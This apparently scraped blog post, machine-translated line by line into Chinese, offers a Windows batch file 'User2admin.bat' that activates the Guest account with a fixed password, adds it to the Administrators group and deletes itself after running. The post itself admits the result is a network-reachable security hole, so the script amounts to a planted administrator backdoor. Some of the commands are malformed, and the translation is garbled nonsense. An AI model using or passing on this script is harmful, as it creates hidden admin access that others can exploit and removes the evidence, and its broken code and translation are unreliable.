Want to convert a user account into an Admin?要轉換的一個用戶帳戶成為政府當局?
Want to convert a user account into an Admin?要轉換的一個用戶帳戶成為政府當局?
All you need to do is copy the code below, copy/paste it into Notepad and save it as User2admin.bat on your desktop.所有您需要做的只是複製代碼如下,複製/粘貼到記事本並保存為user2admin.bat您的桌面上。
echo off迴聲小康
title Please wait…標題請稍候…
cls財利船廠
net user add Username Password /add淨用戶添加用戶名密碼/添加
net user localgroup Administrators Username /add淨用戶localgroup管理員的用戶名/添加
net user Guest 420 /active:yes網用戶客戶420 /主動:是的
net localgroup Guests Guest /DELETE淨localgroup客人客戶/刪除
net localgroup Administrators Guest /add淨localgroup管理員客戶/添加
del %0刪除% 0
Double-click the file to execute or type the above-given code in Command Prompt.雙擊該文件執行或鍵入上述代碼給出了在命令提示符。
Note: this also creates a net account which is also accessable through nets open port (basically it’sa security leak).注:這也創造了淨帳戶,這也是可以通過網開放港口(基本上這是安全漏洞) 。
Popularity: 1%人氣: 1 %
Written by magakos. 寫magakos 。 Read more great feeds at is source 閱讀更多偉大的飼料是來源 WEBSITE 網站
no comments 沒有評論 . 。
Read more articles on 閱讀更多的文章 Scripts 腳本 and 和 WindowS HackS 在Windows的竅門 and 和 All 全部 and 和 otherSoftware othersoftware . 。
- [+] Digg [ + ] digg : Feature this article :特徵此文章
- [+] Del.icio.us [ + ] del.icio.us : Bookmark this article :書籤此文章
- [+] Furl [ + ] furl : Bookmark this article :書籤此文章















